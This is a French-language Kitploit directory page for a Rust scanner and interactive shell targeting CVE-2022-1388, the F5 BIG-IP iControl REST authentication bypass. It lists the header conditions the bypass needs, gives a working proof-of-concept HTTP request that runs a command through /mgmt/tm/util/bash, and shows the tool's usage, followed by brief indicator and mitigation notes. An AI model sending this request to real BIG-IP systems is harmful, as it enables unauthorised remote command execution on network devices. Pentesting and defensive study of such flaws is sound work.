Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-1388-rs — CVE-2022-1388 F5 BIG-IP iControl REST Contournement d'authentification RCE écrit en Rust | Kitploit
Outils/GitHubGitHub/aancw/cve-2022-1388-rs
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubaancw/cve-2022-1388-rs

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST Contournement d'authentification RCE écrit en Rust

Voir le dépôt
2il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-1388-rs

Scanner et shell interactif pour CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE écrit en Rust

Résumé

Pour résumer, voici un aperçu des conditions nécessaires d'une requête pour exploiter cette vulnérabilité :

  • L'en-tête Connection doit inclure X-F5-Auth-Token
  • L'en-tête X-F5-Auth-Token doit être présent
  • L'en-tête Host doit être localhost / 127.0.0.1 ou l'en-tête Connection doit inclure X-Forwarded-Host
  • L'en-tête Auth doit être défini avec le nom d'utilisateur admin et un mot de passe quelconque

PoC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}

Configuration du LAB

  • Vous pouvez trouver le laboratoire ici

Utilisation

root@kitploit:~
$ cve_2022_1308_rs -h

CVE-2022-1388 PoC 1.0
Petruknisme <[email protected]>
Scanner et shell interactif pour CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE écrit en
Rust

USAGE:
    cve_2022_1388_rs [OPTIONS] --url <URL>

OPTIONS:
    -h, --help         Print help information
    -s, --shell        This mode for accessing payload with interactive shell
    -u, --url <URL>    F5 Big-IP target url
    -V, --version      Print version information

Prérequis

  • Rust
  • Cargo

IoCs

Les IoCs peuvent être trouvés dans le fichier journal /var/log/audit. Les commandes non reconnues exécutées par le point de terminaison mgmt/tm/util/bash doivent être source de préoccupation.

Atténuation

Mettez à jour vers la dernière version ou atténuez en suivant les instructions du bulletin de sécurité F5

  • https://support.f5.com/csp/article/K23605346

Références

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Télécharger l’outil